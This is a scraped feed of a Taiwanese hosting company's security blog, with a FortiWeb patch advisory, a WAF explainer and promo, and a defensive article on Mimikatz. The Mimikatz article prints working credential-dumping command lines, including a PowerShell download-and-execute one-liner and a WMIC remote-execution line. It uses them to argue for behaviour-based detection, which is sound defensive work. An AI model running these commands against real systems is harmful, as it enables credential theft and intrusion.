網站安全 | 捕夢網 Blog https://blog.pumo.com.tw 網路安全、資安服務、雲端主機、主機租賃、主機代管、虛擬主機、網站代管專家 Wed, 02 Mar 2022 08:37:01 +0000 zh-TW hourly 1 https://wordpress.org/?v=6.5.5 資安專家發現Fortinet的FortiWeb WAF存在多個嚴重漏洞 https://blog.pumo.com.tw/archives/1394 https://blog.pumo.com.tw/archives/1394#respond Fri, 08 Jan 2021 06:52:21 +0000 http://blog.pumo.com.tw/?p=1394 資安專家發現Fortinet的FortiWeb WAF存在多個嚴重漏...

The post 資安專家發現Fortinet的FortiWeb WAF存在多個嚴重漏洞 first appeared on 捕夢網 Blog.

]]>
資安專家發現Fortinet的FortiWeb WAF存在多個嚴重漏洞,而這些漏洞會導致公司網路遭到駭客攻擊。

Fortinet已發布CVE-2020-29015,CVE-2020-29016, CVE-2020-29018和CVE-2020-29019的更新,請盡快更新。

漏洞包含了blind SQL injection、buffer overflow緩衝區溢位、format string vulnerability格式化字串漏洞等。都可能導致駭客可以執行未經授權的代碼或發動DDoS攻擊等。

請更新至以下版本
6.2.4 or above to address the CVE-2020-29015 flaw
6.3.6 or above to address the CVE-2020-29016 and CVE-2020-29018
6.3.8 or above to address the CVE-2020-29019

原文來源:

https://securityaffairs.co/wordpress/113129/hacking/fortinet-fortiweb-waf-flaws.html?fbclid=IwAR3k3Jm_PslTYqVoGbu09psGvSjr5szGuyX8wLR6Ohn-bFN3_AAYgffLdNg

 

The post 資安專家發現Fortinet的FortiWeb WAF存在多個嚴重漏洞 first appeared on 捕夢網 Blog.

]]>
https://blog.pumo.com.tw/archives/1394/feed 0
WAF是什麼?WAF能幹嘛?我網站需要WAF 嗎? https://blog.pumo.com.tw/archives/1384 https://blog.pumo.com.tw/archives/1384#respond Fri, 08 Jan 2021 06:12:17 +0000 http://blog.pumo.com.tw/?p=1384 WAF是什麼? 現在你我的網站有著各樣的應用程式,例如常用會員登入、...

The post WAF是什麼?WAF能幹嘛?我網站需要WAF 嗎? first appeared on 捕夢網 Blog.

]]>
WAF是什麼?

現在你我的網站有著各樣的應用程式,例如常用會員登入、購物車、訂單系統、線上客服等都是。你確認這些程式都安全無虞沒有漏洞嗎?寫程式的是否為了方便,密碼用明碼儲存?訂單沒有加密傳輸,買什麼東西都被看光光?這些沒注意到的小細節,是駭客眼中的大漏洞。可以利用各式各樣的方式鑽進網站,看用戶密碼偷用戶刷卡資料等。輕則以後駭客就用這些來消費,你的網站用戶就是他的提款機。重則資料拿走,賣給詐騙集團賺錢。

WAF是Web Application Firewall(網站應用程式防火牆)縮寫而來。主要用於保護以上提到的應用程式們。方法是監控要連進網站的HTTP傳輸流量,比對病毒、惡意程式資料庫或惡意攻擊手法等,過濾出可疑流量然後把惡意流量拒絕在外,避免用這些漏洞攻擊網站。

網站都希望流量要大,訪客要多。只是訪客一多,難免有閒雜人等想要趁機混入。今天把網站比喻成一棟大樓,WAF就等於大門警衛的概念,針對每一個進入大樓的訪客進行檢查驗證,只允許好的正常的訪客進入,可疑危險的訪客就拒絕他們進入。

前往了解WAF  https://www.pumo.com.tw/security/waf.jsp

WAF能幹嘛?

根據上面所說的,WAF就是用來過濾可疑連線,保護網站的。

根據資安組織OWASP Top 10公布的2020年10大漏洞

Injection 注入攻擊:
Broken Authentication 無效身分驗證
Sensitive Data Exposure 敏感資料外洩
XML External Entities (XXE) XML 外部處理器漏洞
Broken Access control 無效的存取控管
Security misconfigurations 不安全的組態設定
Cross Site Scripting (XSS) 跨站攻擊
Insecure Deserialization 不安全的反序列化漏洞
Using Components with known vulnerabilities 使用已有漏洞的元件
Insufficient logging and monitoring 紀錄與監控不足

我們由此可知攻擊手法千奇百怪,沒有幫網站做過弱點掃描的話,你怎麼知道你的網站程式藏著哪一些漏洞? WAF就是用來過濾這些針對網站的惡意攻擊的。

 

如何活用WAF 防禦入侵

為你的網站擋下各式各樣的入侵方式來這裡,不只可以了解 SQL injection 和XSS 跨站攻擊等駭客手法如何攻擊你的網站,還可以了解WAF如何抵禦這些入侵攻擊。最重要的是,明白WAF保障電子商務的安全性,捍衛企業多少無形資產

詳細了解WAF如何抵禦入侵? https://www.pumo.com.tw/security/wafApplication.jsp

IIS 伺服器安全  

WAF可以抵禦IIS伺服器以下漏洞

路徑探索(Path Traversal) / 已知蠕蟲 / 遠端命令執行 / 探針(Probes)DDoS攻擊 / 伺服器入侵

透過執行SaaS(Security-as-a-Service)解決方案,無論網站管理員功力厲害與否,WAF能為網站伺服器提供保護,為網站程式避免掉許多威脅。透過檢測分析網站流量內容,確認是否符合或違反通訊協議、port或IP,避免網站程式被攻擊。WAF能提供優化後的防禦服務,防禦DDoS攻擊、XSS跨站攻擊、SQL Injection、path traversal以及其他網站攻擊技術。

雲端安全

雖然藉由雲端運算跑資料執行程式有一定程度的安全疑慮,然而Google、IBM、Amazon及IT大廠強力推動健康照護以及電子商務等雲端服務,意味著這些安全疑慮是未來雲端發展不得不克服的問題。部屬WAF便是保護網站程式及資料的一種方式,雲端服務商不需額外增添硬體設備,可以安裝在網站程式前面提供保護。

WAF可以抵禦雲端以下漏洞

當部屬完成,WAF即可為網站程式抵禦以下已知的威脅:路徑探索(Path Traversal) / 已知蠕蟲 / 遠端命令執行 / 探針(Probes) / DDoS攻擊 / 伺服器入侵
WAF也能深入執行傳統的安全檢測,例如深度檢測網站服務的流量分析,而這種威脅卻是入侵檢測系統和入侵預防系統常常疏忽掉的。

防禦XSS跨站攻擊

比較常見XSS攻擊的例子,如討論區、留言版或任何能輸入資料的地方,允許使用者輸入HTML、JavaScript,並且正常解析執行。當其他使用者瀏覽這篇留言時,便會執行惡意程式。

為何需要WAF來抵禦XSS跨站攻擊?

  • 簡單就能安裝在Apache和IIS伺服器上
  • 針對已知或新興的駭客手法進行防禦
  • 針對即時防禦,預設最佳化的安全規範
  • 提供介面及API,便於管理多台伺服器
  • 無需額外的硬體設備,隨業務規模彈性擴充

電子商務安全

電商利益驚人,卻已成駭客眼中肥羊,保障電商安全是當務之急。信用卡盜用及欺詐。信用卡資料安全性對於電子商務來說格外的重要。著名的TJX事件,便是公司沒有採取安全措施的最佳例子,導致9400萬個帳戶遭到入侵,TJX公司被300家以上的銀行聯合訴訟,賠償金額超過70億美金。駭客落網後,發現他透過SQL Injection技術,在各個網站竊取了超過130萬張信用卡資料。

WAF可以抵禦電子商務以下漏洞

常見竊取金融資料的駭客手法:
SQL Injection / XSS跨站攻擊 / Path Traversal
Session Hijacking(會話劫持) / 惡意軟體(Drive-by downloads)

駭客攻擊

不安全的網站越來越多,駭客虎視眈眈您網路上的一切資料 WAF可以抵禦駭客攻擊以下漏洞

一旦決定攻擊目標,便可利用以下方式展開攻擊:XSS跨站攻擊 / SQL Injection / 遠端命令執行 DDoS攻擊 / Path Traversal / 其他一旦找到漏洞,駭客便直接展開攻擊。更可以利用僵屍電腦擴大攻擊範圍,達到最大效果。

信用卡安全

如果網站的信用卡資料常常遭竊的話,除了營業損失之外,還得時常面對法律訴訟以及其他罰款。消費者一旦認定說,在這個網站消費不安全,不願在此消費時,會明顯影響公司的收入。品牌聲譽受損,比任何罰款都來得嚴重。

透過WAF,我們可以即時檢測網站的流量內容,尋找那些已知或未知的惡意封包。這可是原始碼檢測所做不到的。

Apache伺服器安全工具

如果認為Apache伺服器比微軟IIS伺服器安全許多的話,那可真是大錯特錯。跟其他軟體一樣,Apache也是充滿漏洞容易受到攻擊。別把安全視為理所當然,正確設定Apache伺服器

Apache伺服器的安全性一直都在網路管理員的優先名單之內。但你沒有用同樣嚴謹的態度對待這些網站程式的話,還是很容易壟罩在駭客攻擊的陰影中。 常見針對網站程式的攻擊手法有:
XSS跨站攻擊 / 路徑探索(Path Traversal) / SQL Injection
會話劫持(Session Hijacking) / Link Injection / 惡意軟體 / DDoS攻擊

PCI DSS標準規範

為合乎規範安裝WAF的必要性

WAF提供一個直接且節省成本的安全解決方案。不僅合乎PCI標準規範,也針對SQL injection、XSS跨站攻擊和衝著網站程式來的攻擊,提供即時性的防禦。WAF強調預防入侵,而非偵測漏洞。針對網站流量進行深入的封包檢測,在網站程式前架設一道安全防禦。

優點如下:

  • 合乎PCI標準規範
  • 不需付出額外的研發成本
  • 適用於由第三方開發的程式或元件

防護流程示意圖

下方這張圖片可用來說明,每個連線來源與目的都不相同,有登入會員的,有查訂單的。為了不讓所有連線用戶沒有差別的大搖大擺地進入網站,WAF會在進入網站之前,築起一道防護關卡。透過現有的資安威脅資料庫進行流量分析比對,判斷每個連線是否安全,准許安全流量進入網站。那些可疑的、有害的、不信任的流量就排除在外,避免惡意流量入侵網站影響安全性,確保網站的正常營運。

我網站需要WAF嗎?

講完「WAF是什麼?」「WAF能幹嘛?」,一定會有人說「我把程式寫得安全一點才是治本的方法。」把程式寫得很安全,這種思維絕對沒錯。值得鼓勵。

但是怎樣才算是安全沒有漏洞?現在寫得很安全,也許幾個月後駭客有新的攻擊手法!現在寫得很安全,換一個寫程式的,在他眼中網站漏洞百出,你要考慮網站整個重寫嗎?

當然你要重寫程式甚至重寫網站,都是自己的選擇。但是聰明的你要想一想這樣做是否符合成本效益?還是自找麻煩?

WAF扮演重要的網站安全角色。以捕夢網累積服務過很多用戶的經驗,我們明白網站時常經歷歷代不同工程師的改造(?),每個人的程式邏輯都不一樣。如果沒有統一管理或是依循不同邏輯繼續擴增網站服務,在新舊並存、語法各自為政的狀態下,網站在駭客眼中等同漏洞百出,可是企業往往不自知,讓他們駭客有機可趁。所以「網站需要WAF嗎?」,你認為呢?

WAF對網站的價值在哪?

如果你還是不明白WAF的價值在哪?你可以先想一想你網站價值在哪?

疫情只是催化劑而已,企業將產品及服務轉移到網路上早已是趨勢。在家就可以逛街買東西,手機滑一下就可以轉帳,平板開APP就可以看電影。網站取代了很多實體服務。這時候若網站被駭客攻擊、遭受勒索病毒、客戶資料外洩,導致面臨網站關閉。影響企業銷售、品牌名聲甚至經營存續。跟WAF比起來,網站的價值是否遠大於WAF?是否需要WAF,可以先從網站對您企業所具有的重要性與價值來判斷。

可是裝了WAF不表示就此高枕無憂,網站不需要做其他資安防護。駭客還是有許多其他方式鬧到你的網站生不如死的。

想更多了解WAF,可以參考我們捕夢網的官網https://www.pumo.com.tw/security/waf.jsp

或是打電話或是來信給捕夢網,我們可以針對網站資安好好來聊一聊。
電話:02-8226-9123
信箱:service@pumo.com.tw

#WAF #WEB APPLICATION FIREWALL #網站應用程式防火牆

#SECURITY #WEB SECURITY #弱點掃描

#OWASP #OWASP TOP 10 #網站安全

#網站應用程式安全 #網站安全 #網站漏洞

The post WAF是什麼?WAF能幹嘛?我網站需要WAF 嗎? first appeared on 捕夢網 Blog.

]]>
https://blog.pumo.com.tw/archives/1384/feed 0
簡單而粗暴:網路攻擊界的AK47 https://blog.pumo.com.tw/archives/1023 https://blog.pumo.com.tw/archives/1023#respond Thu, 09 May 2019 06:16:25 +0000 http://blog.pumo.com.tw/?p=1023 Mimikatz是一款廣受資訊駭客與流氓國家歡迎的開源提權工具包。很...

The post 簡單而粗暴:網路攻擊界的AK47 first appeared on 捕夢網 Blog.

]]>
Mimikatz是一款廣受資訊駭客與流氓國家歡迎的開源提權工具包。很多資安界的人士都聽說過這款工具的大名。對於沒有聽說過的人而言,那就是一個巨大的威脅。這款工具堪稱網路攻擊武器庫中的AK47,即便沒到入侵者人手一把的程度,也幾乎可以當成是網路攻擊標準配備了。對此一無所知的人可能面臨或已經遭遇了它的侵害。

無論對手是誰,幾乎所有Windows入侵當中都能見到它的身影。這不僅僅是一種流行的憑證獲取方法,也是針對性攻擊者和滲透測試人員都常用的憑證獲取工具,因為這工具對於繞過基於特徵碼檢測的功能和有效性都十分強大。

攻擊者常會尋找有效憑證以提高許可權限,並擴大其在目標環境中的染指範圍,獲得有效憑證的方法也是八仙過海各顯神通,有些攻擊者甚至針對同一個目標都會採用多種憑證盜竊技術。

 

Mimikatz採用4種主要方式:

  1. 修改可執行檔名稱
  2. 運用批次檔
  3. 採用PowerShell變種
  4. 改變命令列選項

 

我們仔細分析一下。

  1. 隱蔽:修改可執行檔名稱

攻擊者使用該工具最簡單直接的方法就是將其拷貝到被入侵的系統中,修改可執行檔的檔案名,用以下命令列啟動之:

c:\ProgramData\p.exe  “”privilege::debug””

“”sekurlsa::logonpasswords””

如此這般,系統的憑證資訊便落入了攻擊者手中。

 

  1. 有效:使用批次檔

運用該工具的其他方式還包括採用批次檔將工具複製到目標系統執行,然後將結果輸出到一個檔,並將該輸出檔複製回中心收集點,最後再在目標系統上刪除所有相關檔。

 

  1. 召喚力量支援:採用PowerShell變種

採用Mimikatz的PowerShell變種是又一種獲取目標系統憑證資訊的方法,比如:

powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -Command ‘privilege::debug sekurlsa::logonpasswordsexit’

 

  1. 改變命令列選項

2018年第四季度見證了Mimikatz工具的另類用法,尤其是修改命令列選項的一種:

mnl.exe pr::dg sl::lp et -p

 

該特殊的Mimikatz變種通過WMIC.exe對多個目標系統下手,比如:

Wmic  /NODE:”[REDACTED]” /USER:”[REDACTED]” /password:[REDACTED] process call create “cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >> c:\windows\temp\temp.txt”

 

花招百出:需要全面的應對方法

這一系列有效戰術充分顯示出監測攻擊指標(IOA)的重要性。每種技術都是逃避脆弱檢測方法的嘗試,這些脆弱檢測方法要麼只檢測命令列選項以推斷其目的,要麼只檢查二進位檔案中有沒有出現相關字串。

攻擊者可以運用多種技術獲取憑證資訊,但公司企業需要一定程度的可見性以便防禦者能夠觀察到攻擊者所用的新技術,包括被特別用於繞過和顛覆檢測機制的那些。

攻擊指標(IOA)專注於攻擊技術的行為特徵,而不是像檔案名、散列值或單個命令列選項這樣的傳統入侵指標(IOC)。新一代IOA過程能賦予防禦者看清新攻擊技術的能力,即便攻擊者使用了專門的規避或顛覆檢測機制的方法。這是因為IOA著眼攻擊者的意圖,而萬變不離其宗,無論攻擊者使用哪種惡意軟體或漏洞利用程式,終歸逃不脫其惡意目的,只要盯緊攻擊意圖,攻擊便無所遁形。

網路取證領域中,IOC往往被描述為電腦上留存的指征網路安全被破壞的證據。在接到可疑事件通報,或是定期檢查,亦或發現網路中非正常呼出後,調查人員往往會去收集這些資料。理想狀況下,這些資訊被收集以後能夠創建更智慧的工具,可以檢測並隔離未來的可疑檔。因為IOC提供的是跟蹤壞人的反應式方法,當你發現IOC時,有極大的可能性已經被黑了。

此類IOC指征一系列惡意活動,從簡單的I/O操作到提權都有。注重行為特徵的IOA關聯則將這些指標都綜合到一起,用以檢測並防止惡意行為。其結果就是連通過反射注入PowerShell模組進行的憑證盜竊都能檢測出來的防禦技術,可以在攻擊者實際觀測到憑證前扼住該憑證盜取行為。

與基於特徵碼的殺毒軟體類似,基於IOC的檢測方法無法檢測無惡意軟體的威脅和零日漏洞攻擊。因此,公司企業紛紛轉向基於IOA的方法以便更好地適應其安全需求。

 

The post 簡單而粗暴:網路攻擊界的AK47 first appeared on 捕夢網 Blog.

]]>
https://blog.pumo.com.tw/archives/1023/feed 0
2018 MOPCON 被遺忘的資安 https://blog.pumo.com.tw/archives/912 https://blog.pumo.com.tw/archives/912#respond Thu, 08 Nov 2018 06:10:20 +0000 http://blog.pumo.com.tw/?p=912 資安!一般人聽起來就是好艱深,一定要專家才會懂。   所以...

The post 2018 MOPCON 被遺忘的資安 first appeared on 捕夢網 Blog.

]]>
什麼是SSL

資安!一般人聽起來就是好艱深,一定要專家才會懂。
 
所以我們自動放棄認識資安、理解資安,資安就這樣被遺忘了。
 
於是我們便成為資安風險的幫兇。也許在隨手寄出的信件中,也許在為了方便記憶的簡單密碼中。
 
蛛絲馬跡中,洩漏了許多不為人知的機密。
 
你不曉得,資安卻在這細節中逐漸崩壞。資安沒有很難,不需要專家才能做。
 
只需要喚醒心中沉睡的資安意識,你也能成為資安一份子。
 
捕夢網,與你一起找回「被遺忘的資安」。

#資安
#資訊安全
#WAF
#dotDefender
#網站程式防火牆
#網站安全
#網站程式安全
#WebApplicationFirewall
#台灣獨家代理

The post 2018 MOPCON 被遺忘的資安 first appeared on 捕夢網 Blog.

]]>
https://blog.pumo.com.tw/archives/912/feed 0